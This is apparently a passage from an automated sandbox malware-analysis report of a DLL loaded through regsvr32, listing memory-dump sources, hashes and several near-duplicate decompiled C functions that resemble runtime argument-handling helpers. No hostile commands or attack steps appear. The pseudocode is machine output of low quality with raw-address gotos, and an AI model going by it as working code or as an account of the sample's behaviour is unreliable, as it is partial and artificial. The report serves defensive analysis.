                                                                      0x18001d1da
                                                                      0x18001d1dc
                                                                      0x18001d1e0
                                                                      0x18001d1e3
                                                                      0x18001d1ea
                                                                      0x18001d1ee
                                                                      0x18001d1f5
                                                                      0x18001d1f9
                                                                      0x18001d1fe
                                                                      0x18001d203
                                                                      0x18001d208
                                                                      0x18001d215
                                                                      0x18001d224

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: 8c49b4f7f82e50c51f82893521a9c2ffdd990c00cd1f847759e73bb511d0a3bd
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: 9D31A272204B88D6EB618F29D4503AD7BA0F39DB88F248126EB4C4B355CF36C556C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800234CC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800234f8;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t68 - 8));
                                                                      				goto 0x800235c6;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023539;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x800235c8;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800235b7;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023573;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800235c8;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8002356b;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x8002356e;
                                                                      				 *_t72 =  *((char*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800234cc
                                                                      0x1800234dd
                                                                      0x1800234e0
                                                                      0x1800234e2
                                                                      0x1800234e7
                                                                      0x1800234f0
                                                                      0x1800234f3
                                                                      0x180023502
                                                                      0x180023504
                                                                      0x18002350a
                                                                      0x18002350d
                                                                      0x180023512
                                                                      0x180023516
                                                                      0x18002351d
                                                                      0x180023523
                                                                      0x180023528
                                                                      0x18002352d
                                                                      0x180023534
                                                                      0x180023544
                                                                      0x180023546
                                                                      0x180023550
                                                                      0x180023554
                                                                      0x18002355c
                                                                      0x18002355e
                                                                      0x180023564
                                                                      0x180023568
                                                                      0x18002356b
                                                                      0x180023571
                                                                      0x180023573
                                                                      0x180023577
                                                                      0x18002357d
                                                                      0x180023587
                                                                      0x180023589
                                                                      0x18002358d
                                                                      0x180023590
                                                                      0x180023597
                                                                      0x18002359b
                                                                      0x1800235a2
                                                                      0x1800235a6
                                                                      0x1800235ab
                                                                      0x1800235b0
                                                                      0x1800235b5
                                                                      0x1800235c3
                                                                      0x1800235d2

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fced4f406aaea93943e09feb26ab9e5b89382de7dd907e95984633aab03ce025
                                                                      • Instruction ID: db65a29db9d178c959a58f3cda3f2657f68a17bbaf16c5f5f93edfe238370ddb
                                                                      • Opcode Fuzzy Hash: fced4f406aaea93943e09feb26ab9e5b89382de7dd907e95984633aab03ce025
                                                                      • Instruction Fuzzy Hash: A431A473204B9486EB628F29E4413AD7BA0E39DF8CF658115DB8D0B755CF36C556CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118002557C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800255a8;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t68 - 8));
                                                                      				goto 0x80025676;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800255e9;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x80025678;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025667;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025623;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80025678;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8002561b;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x8002561e;
                                                                      				 *_t72 =  *((char*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18002557c
                                                                      0x18002558d
                                                                      0x180025590
                                                                      0x180025592
                                                                      0x180025597
                                                                      0x1800255a0
                                                                      0x1800255a3
                                                                      0x1800255b2
                                                                      0x1800255b4
                                                                      0x1800255ba
                                                                      0x1800255bd
                                                                      0x1800255c2
                                                                      0x1800255c6
                                                                      0x1800255cd
                                                                      0x1800255d3
                                                                      0x1800255d8
                                                                      0x1800255dd
                                                                      0x1800255e4
                                                                      0x1800255f4
                                                                      0x1800255f6
                                                                      0x180025600
                                                                      0x180025604
                                                                      0x18002560c
                                                                      0x18002560e
                                                                      0x180025614
                                                                      0x180025618
                                                                      0x18002561b
                                                                      0x180025621
                                                                      0x180025623
                                                                      0x180025627
                                                                      0x18002562d
                                                                      0x180025637
                                                                      0x180025639
                                                                      0x18002563d
                                                                      0x180025640
                                                                      0x180025647
                                                                      0x18002564b
                                                                      0x180025652
                                                                      0x180025656
                                                                      0x18002565b
                                                                      0x180025660
                                                                      0x180025665
                                                                      0x180025673
                                                                      0x180025682

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fced4f406aaea93943e09feb26ab9e5b89382de7dd907e95984633aab03ce025
                                                                      • Instruction ID: b5a1c0145a655d35f8028bf6f7a2e7f5aeab918865468feced98172fe4a7a70c
                                                                      • Opcode Fuzzy Hash: fced4f406aaea93943e09feb26ab9e5b89382de7dd907e95984633aab03ce025
                                                                      • Instruction Fuzzy Hash: 6631D473204B8486EB628F29E0543AD7BA0F38DB9CF648125EB8C4B351CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800235D4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023600;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800236cd;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023641;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x800236cf;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800236bf;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8002367b;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800236cf;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E00000001180015A5C(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80023673;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80023676;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x1800235d4
                                                                      0x1800235d4
                                                                      0x1800235e5
                                                                      0x1800235e8
                                                                      0x1800235ea
                                                                      0x1800235ef
                                                                      0x1800235f3
                                                                      0x1800235f8
                                                                      0x1800235fb
                                                                      0x18002360a
                                                                      0x18002360c
                                                                      0x180023612
                                                                      0x180023615
                                                                      0x18002361a
                                                                      0x18002361e
                                                                      0x180023625
                                                                      0x18002362b
                                                                      0x180023630
                                                                      0x180023635
                                                                      0x18002363c
                                                                      0x18002364c
                                                                      0x18002364e
                                                                      0x180023658
                                                                      0x18002365c
                                                                      0x180023664
                                                                      0x180023666
                                                                      0x18002366c
                                                                      0x180023670
                                                                      0x180023673
                                                                      0x180023679
                                                                      0x18002367b
                                                                      0x18002367f
                                                                      0x18002368f
                                                                      0x180023691
                                                                      0x180023695
                                                                      0x180023698
                                                                      0x18002369f
                                                                      0x1800236a3
                                                                      0x1800236aa
                                                                      0x1800236ae
                                                                      0x1800236b3
                                                                      0x1800236b8
                                                                      0x1800236bd
                                                                      0x1800236ca
                                                                      0x1800236d9

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24a0662261c384d650eed682ade6788f0a148439f5ef1b8d27f303f22806b5f8
                                                                      • Instruction ID: c20f2539042dd6082de6f48d0c95d6d25f23a76bd4dada5ca67279dcf3be879e
                                                                      • Opcode Fuzzy Hash: 24a0662261c384d650eed682ade6788f0a148439f5ef1b8d27f303f22806b5f8
                                                                      • Instruction Fuzzy Hash: B031A472204B848AEB628F29D4453AD7BA4F38DB8CF65C115EB8D4B761CF36C556DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180025684(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800256b0;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x8002577d;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800256f1;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x8002577f;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8002576f;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8002572b;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8002577f;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E0000000118000E818(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80025723;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80025726;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180025684
                                                                      0x180025684
                                                                      0x180025695
                                                                      0x180025698
                                                                      0x18002569a
                                                                      0x18002569f
                                                                      0x1800256a3
                                                                      0x1800256a8
                                                                      0x1800256ab
                                                                      0x1800256ba
                                                                      0x1800256bc
                                                                      0x1800256c2
                                                                      0x1800256c5
                                                                      0x1800256ca
                                                                      0x1800256ce
                                                                      0x1800256d5
                                                                      0x1800256db
                                                                      0x1800256e0
                                                                      0x1800256e5
                                                                      0x1800256ec
                                                                      0x1800256fc
                                                                      0x1800256fe
                                                                      0x180025708
                                                                      0x18002570c
                                                                      0x180025714
                                                                      0x180025716
                                                                      0x18002571c
                                                                      0x180025720
                                                                      0x180025723
                                                                      0x180025729
                                                                      0x18002572b
                                                                      0x18002572f
                                                                      0x18002573f
                                                                      0x180025741
                                                                      0x180025745
                                                                      0x180025748
                                                                      0x18002574f
                                                                      0x180025753
                                                                      0x18002575a
                                                                      0x18002575e
                                                                      0x180025763
                                                                      0x180025768
                                                                      0x18002576d
                                                                      0x18002577a
                                                                      0x180025789

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24a0662261c384d650eed682ade6788f0a148439f5ef1b8d27f303f22806b5f8
                                                                      • Instruction ID: a8d0cc3587bb0854a8a104f2b031b3c69fb9e732ad5cafa1b15f999fa23bd918
                                                                      • Opcode Fuzzy Hash: 24a0662261c384d650eed682ade6788f0a148439f5ef1b8d27f303f22806b5f8
                                                                      • Instruction Fuzzy Hash: 54319372218B84C6EB628F29E5403AD7BA0E39DB8CF248115EB8D4B751DF36C556DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800236DC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023708;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t68 - 8));
                                                                      				goto 0x800237d6;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023749;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x800237d8;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800237c7;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023783;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800237d8;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8002377b;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x8002377e;
                                                                      				 *_t72 =  *((short*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800236dc
                                                                      0x1800236ed
                                                                      0x1800236f0
                                                                      0x1800236f2
                                                                      0x1800236f7
                                                                      0x180023700
                                                                      0x180023703
                                                                      0x180023712
                                                                      0x180023714
                                                                      0x18002371a
                                                                      0x18002371d
                                                                      0x180023722
                                                                      0x180023726
                                                                      0x18002372d
                                                                      0x180023733
                                                                      0x180023738
                                                                      0x18002373d
                                                                      0x180023744
                                                                      0x180023754
                                                                      0x180023756
                                                                      0x180023760
                                                                      0x180023764
                                                                      0x18002376c
                                                                      0x18002376e
                                                                      0x180023774
                                                                      0x180023778
                                                                      0x18002377b
                                                                      0x180023781
                                                                      0x180023783
                                                                      0x180023787
                                                                      0x18002378d
                                                                      0x180023797
                                                                      0x180023799
                                                                      0x18002379d
                                                                      0x1800237a0
                                                                      0x1800237a7
                                                                      0x1800237ab
                                                                      0x1800237b2
                                                                      0x1800237b6
                                                                      0x1800237bb
                                                                      0x1800237c0
                                                                      0x1800237c5
                                                                      0x1800237d3
                                                                      0x1800237e2

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
